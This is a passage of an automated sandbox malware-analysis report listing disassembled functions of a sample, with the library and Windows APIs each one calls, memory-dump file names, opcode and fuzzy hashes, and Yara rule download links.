                                                                                                                                                  • Opcode ID: f39844744df86a0ee6e178e390e29fb02175ad00edad923d08379313cb304e04
                                                                                                                                                  • Instruction ID: e7c4f70ffb6bf8b97c1b477e3b0119ad809ad3658d56435aadb9c8e924be31e8
                                                                                                                                                  • Opcode Fuzzy Hash: f39844744df86a0ee6e178e390e29fb02175ad00edad923d08379313cb304e04
                                                                                                                                                  • Instruction Fuzzy Hash: 58118C718083029BC310EF69EC45B0EFBE8EF99750F10465EF495972A1EB70DA48CB96
                                                                                                                                                  Function 00BE0FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE593C: __FF_MSGBANNER.LIBCMT ref: 00BE5953
                                                                                                                                                    • Part of subcall function 00BE593C: __NMSG_WRITE.LIBCMT ref: 00BE595A
                                                                                                                                                    • Part of subcall function 00BE593C: HeapAlloc.KERNEL32(016E0000,00000000,00000001,?,00000004,?,?,00BE1003,?), ref: 00BE597F
                                                                                                                                                  • std::exception::exception.LIBCMT ref: 00BE101C
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00BE1031
                                                                                                                                                    • Part of subcall function 00BE87CB: RaiseException.KERNEL32(?,?,?,00C7CAF8,?,?,?,?,?,00BE1036,?,00C7CAF8,?,00000001), ref: 00BE8820
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2103478672-0
                                                                                                                                                  • Opcode ID: e7d82c1f2b4310a93ac00dcb2d4fb1bb5ffd7f855909953c9af231b7c3157226
                                                                                                                                                  • Instruction ID: 8f3ebf0a92c095a62e16b823199057c7a3644820be87a927b071777faaa35ef0
                                                                                                                                                  • Opcode Fuzzy Hash: e7d82c1f2b4310a93ac00dcb2d4fb1bb5ffd7f855909953c9af231b7c3157226
                                                                                                                                                  • Instruction Fuzzy Hash: B5F0F47460428DA6CB20BA5ADC159DE7BFCDF00351F2004A5FC08A2292DFB08B84C2E4
                                                                                                                                                  Function 00BE581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __lock_file_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 26237723-0
                                                                                                                                                  • Opcode ID: 9608d6f76d9363ddf0c5572d3811356e1c2130d12f4f74991d5a841272cf8e5e
                                                                                                                                                  • Instruction ID: da447fc42f29c31894d485d01b76f0c16ae3628dcc49d91d52465837be26d90d
                                                                                                                                                  • Opcode Fuzzy Hash: 9608d6f76d9363ddf0c5572d3811356e1c2130d12f4f74991d5a841272cf8e5e
                                                                                                                                                  • Instruction Fuzzy Hash: B2014871C00A89EBCF21AF678C0599F7BE1AF90764F148295B828571A1D7718611DF91
                                                                                                                                                  Function 00BE55C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE8D58: __getptd_noexit.LIBCMT ref: 00BE8D58
                                                                                                                                                  • __lock_file.LIBCMT ref: 00BE560B
                                                                                                                                                    • Part of subcall function 00BE6E3E: __lock.LIBCMT ref: 00BE6E61
                                                                                                                                                  • __fclose_nolock.LIBCMT ref: 00BE5616
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                                  • Opcode ID: 9b53e360b852db6148b630238d880aabbc323e5d1f3d0e9ec6e2d9eb7d68e305
                                                                                                                                                  • Instruction ID: 680d14108b994d72161dd48487c8b7fa28c3101eb81762f19c1d5f61f8efa6fa
                                                                                                                                                  • Opcode Fuzzy Hash: 9b53e360b852db6148b630238d880aabbc323e5d1f3d0e9ec6e2d9eb7d68e305
                                                                                                                                                  • Instruction Fuzzy Hash: 96F0B471801F859AD7316B778C0276E77E16F50379F2182C9A829AB1C1CF7C89019F61
                                                                                                                                                  Function 00BE5E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __lock_file.LIBCMT ref: 00BE5EB4
                                                                                                                                                  • __ftell_nolock.LIBCMT ref: 00BE5EBF
                                                                                                                                                    • Part of subcall function 00BE8D58: __getptd_noexit.LIBCMT ref: 00BE8D58
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2999321469-0
                                                                                                                                                  • Opcode ID: c548642826ac2f133d6812e0f9246122dbc9db0d112fc3b1f8ffac194d00bfa9
                                                                                                                                                  • Instruction ID: fbc064676f4987835e0af2dd9b032f451e016aa3b2e3a357fe90055a527db2ad
                                                                                                                                                  • Opcode Fuzzy Hash: c548642826ac2f133d6812e0f9246122dbc9db0d112fc3b1f8ffac194d00bfa9
                                                                                                                                                  • Instruction Fuzzy Hash: CCF0EC71911A959AD720BB768D0375E72D06F51335F1143D5B028BB1C1CF788E419B91
                                                                                                                                                  Function 00BD5AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00BD5AEF
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BD5B1F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconNotifyShell__memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 928536360-0
                                                                                                                                                  • Opcode ID: 8496758d1b415106123027a49f3172cf760f39ea496addb259ecbc0fd7898412
                                                                                                                                                  • Instruction ID: 45fd5776007d7cc21567733df3d6a41d4afc7c9698d77ab63673c1f35a183794
                                                                                                                                                  • Opcode Fuzzy Hash: 8496758d1b415106123027a49f3172cf760f39ea496addb259ecbc0fd7898412
                                                                                                                                                  • Instruction Fuzzy Hash: E6F0A7708083189FDBA28F24DC49799B7BC970030CF1002EABA4896292E7714B88CF55
                                                                                                                                                  Function 00C3C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LoadString$__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 207118244-0
                                                                                                                                                  • Opcode ID: 055faaff886757913dd9409aa36fc4fe1f46d0ed45af4834af3a366303ca7c86
                                                                                                                                                  • Instruction ID: a54e64352f97f243e4642002fe374d6d03da575231711ceabd2457e270983611
                                                                                                                                                  • Opcode Fuzzy Hash: 055faaff886757913dd9409aa36fc4fe1f46d0ed45af4834af3a366303ca7c86
                                                                                                                                                  • Instruction Fuzzy Hash: C0B16F35A10109EFCB14EFA4D891DFEB7B5FF58710F10815AF926A7291EB30AA51CB50
                                                                                                                                                  Function 00BCA820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                                                                                  • Instruction ID: 271db290f5ec4b85b6cb8c8703effe80d6f1c4306413080fde469ff761ee0242
                                                                                                                                                  • Opcode Fuzzy Hash: 6c00e00610a2f6b5b9c75c50a0c0d75d754e7477f8d5fd79ed90822e01c4b6f7
                                                                                                                                                  • Instruction Fuzzy Hash: EC61CB7060020A9FDB10EF50C886F7AB7F9EF44308F1181ADE8569B291E7B4ED80CB52
                                                                                                                                                  Function 00BD343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                                                                                  • Instruction ID: 7560ade7e0d4cb96ae8e5375bebc02b326fd08eed5c417b5750737a72a078106
                                                                                                                                                  • Opcode Fuzzy Hash: 719ee5b0fa6b9ba4850e2a8071915d723d28199ea914ec437d6a439a6195b7a7
                                                                                                                                                  • Instruction Fuzzy Hash: AA31D479204A02DFC724DF19D090A25F7E0FF08760714C5AEE88A8B752EB70DD91CB91
                                                                                                                                                  Function 00BFE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b46bcffe08212c1e3370f9a153aee0186db38d86861426d2c1c2e9806ac9a8ce
                                                                                                                                                  • Instruction ID: e58938be5a00341b552b13f8644f775a96b0170918553d488805755d8764d34c
                                                                                                                                                  • Opcode Fuzzy Hash: b46bcffe08212c1e3370f9a153aee0186db38d86861426d2c1c2e9806ac9a8ce
                                                                                                                                                  • Instruction Fuzzy Hash: 2E41E5745083519FDB24DF14C488F2ABBE1FF45308F1988ACE9999B362C771E889CB52
                                                                                                                                                  Function 00BD49C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00BD4B63
                                                                                                                                                    • Part of subcall function 00BE547B: __wfsopen.LIBCMT ref: 00BE5486
                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00BD27AF,?,00000001), ref: 00BD49F4
                                                                                                                                                    • Part of subcall function 00BD4ADE: FreeLibrary.KERNEL32(00000000), ref: 00BD4B18
                                                                                                                                                    • Part of subcall function 00BD48B0: _memmove.LIBCMT ref: 00BD48FA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1396898556-0
                                                                                                                                                  • Opcode ID: bcbe54eb509a23a0cb895a1c22d4f206f85ed5ddf9413a1e2d394f2d7c9c6dc8
                                                                                                                                                  • Instruction ID: 52f6eb1a81be9c926b7bc3bc98538222fba35acabd1eda94090d6bd191b5a5cc
                                                                                                                                                  • Opcode Fuzzy Hash: bcbe54eb509a23a0cb895a1c22d4f206f85ed5ddf9413a1e2d394f2d7c9c6dc8
                                                                                                                                                  • Instruction Fuzzy Hash: DE11C431650205ABDF10EB60CC46FAEB7E9DF40701F20446AF945A62C1FBB59E51A794
                                                                                                                                                  Function 00BD1BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                                                                                  • Instruction ID: df0c33a0061392bd331e14cd34a3ba2cb04558dd8d3157af8ccdd1b7d7c5995e
                                                                                                                                                  • Opcode Fuzzy Hash: d3511936f2c3a9f0ed1f08c39fcca023c8dcb164a1ab07be1a9a79502957a79d
                                                                                                                                                  • Instruction Fuzzy Hash: 6B114C76204601EFC724DF2DD481916F7E9FF49350724886EE48ACB361E732E841CB50
                                                                                                                                                  Function 00BFE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c7700f3eb2ff92f6a69209b96120805639af8aae32068f11fb75ebda8659cb67
                                                                                                                                                  • Instruction ID: d6bbea74f1b6383149960c72c08af112f087e8edc7b1bbb0d82d5c40ea845167
                                                                                                                                                  • Opcode Fuzzy Hash: c7700f3eb2ff92f6a69209b96120805639af8aae32068f11fb75ebda8659cb67
                                                                                                                                                  • Instruction Fuzzy Hash: 4F21D0B4508341DFDB24DF54C484F2ABBE5BF84304F1989ACE98A5B362D731E849CB92
                                                                                                                                                  Function 00BD1A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                                  • Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                                                                                  • Instruction ID: 2af4278f411b3b8309fb5d01f28ab6bc8cfb8adc826bae718a31760f053d0df5
                                                                                                                                                  • Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
                                                                                                                                                  • Instruction Fuzzy Hash: 7E0126722017017ED3205F3DC802B67FBD8DB447A0F50896AF52ACA2D1EB71E4408BA0
                                                                                                                                                  Function 00C3495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00C34998
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1431749950-0
                                                                                                                                                  • Opcode ID: 1c289c616bae2bdde94402de92ee352823485b0d14986e96ba6fc4e8589a986c
                                                                                                                                                  • Instruction ID: 1ae3c504013b70b30830d8236e6b9f0e54fe227ed7f206d7594ae8744df987f9
                                                                                                                                                  • Opcode Fuzzy Hash: 1c289c616bae2bdde94402de92ee352823485b0d14986e96ba6fc4e8589a986c
                                                                                                                                                  • Instruction Fuzzy Hash: EFF01D35618245AF8B14FB65D84AD9F77FCEF45320B10449AF8059B291DB70AD81D750
                                                                                                                                                  Function 00C27C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE0FE6: std::exception::exception.LIBCMT ref: 00BE101C
                                                                                                                                                    • Part of subcall function 00BE0FE6: __CxxThrowException@8.LIBCMT ref: 00BE1031
                                                                                                                                                  • _memset.LIBCMT ref: 00C27CB4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Exception@8Throw_memsetstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 525207782-0
                                                                                                                                                  • Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
                                                                                                                                                  • Instruction ID: 6a4c2d5d7c112c95ff915fcdc0496cb49357c05771c3517c4b6b475a5adc7394
                                                                                                                                                  • Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
